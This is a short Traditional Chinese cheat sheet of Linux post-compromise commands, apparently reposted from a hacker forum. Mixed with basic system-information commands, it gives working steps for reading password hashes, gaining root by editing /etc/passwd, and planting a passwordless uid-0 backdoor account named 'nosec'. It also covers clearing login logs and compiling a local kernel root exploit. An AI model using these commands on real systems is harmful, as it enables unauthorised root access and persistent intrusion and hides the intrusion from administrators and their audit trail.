cat /etc/passwd 查看linux使用者
cat /etc/shadow 查看使用者密碼需要root許可權
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網卡號 查看所在網卡的ip資訊
ifconfig 查看本機ip資訊
cat /etc/resolv.conf 查看DNS資訊
bash -i 在反彈的shell中使用可以直觀顯示命令
bash prompt: 當你以普通限權使用者身份進入的時候,一般你會有一個類似bash$的prompt。當你以Root登陸時,你的prompt會變成
bash#。
系統變數 : 試著echo "$USER / $EUID" 系統應該會告訴你它認為你是什麼使用者。
echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯了,應該是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,預設是0,也就是核心不進行資料包過濾,改為1 ,讓核心對資料包進行filter處理!
netstat -an |grep LISTEN |grep :80 查看連接埠
service --status-all | grep running
service --status-all | grep http
查看運行服務
lsb_release -a 查看系統版本
重啟ssh服務 :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config檔案裡
PasswordAuthentication no,
將其改為
PasswordAuthentication yes
遠程ssh才可登入
否則顯示Access denied
其中Usepam yes可能用來建立pam方式login,比如從其它linux主機ssh到服務端,如果關閉,則不能開啟.
su的菜鳥用法
先chomod 777 /etc/passwd
然後修改bin使用者的gid和uid為0
然後passwd設定bin的密碼
然後cp /bin/bash /sbin/nologin
然後su的時候su - bin就可以到rootshell了。
這個原理就是當ssh不允許root用ssh終端登陸的時候,我們又不知道root密碼,的一種很菜鳥的做法
還可以這樣
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空last記錄 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一個100m的大檔案在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權的時候要用到的
摘自紅色駭客聯盟(www.7747.net) 原文:http://www.7747.net/Article/200906/39788.html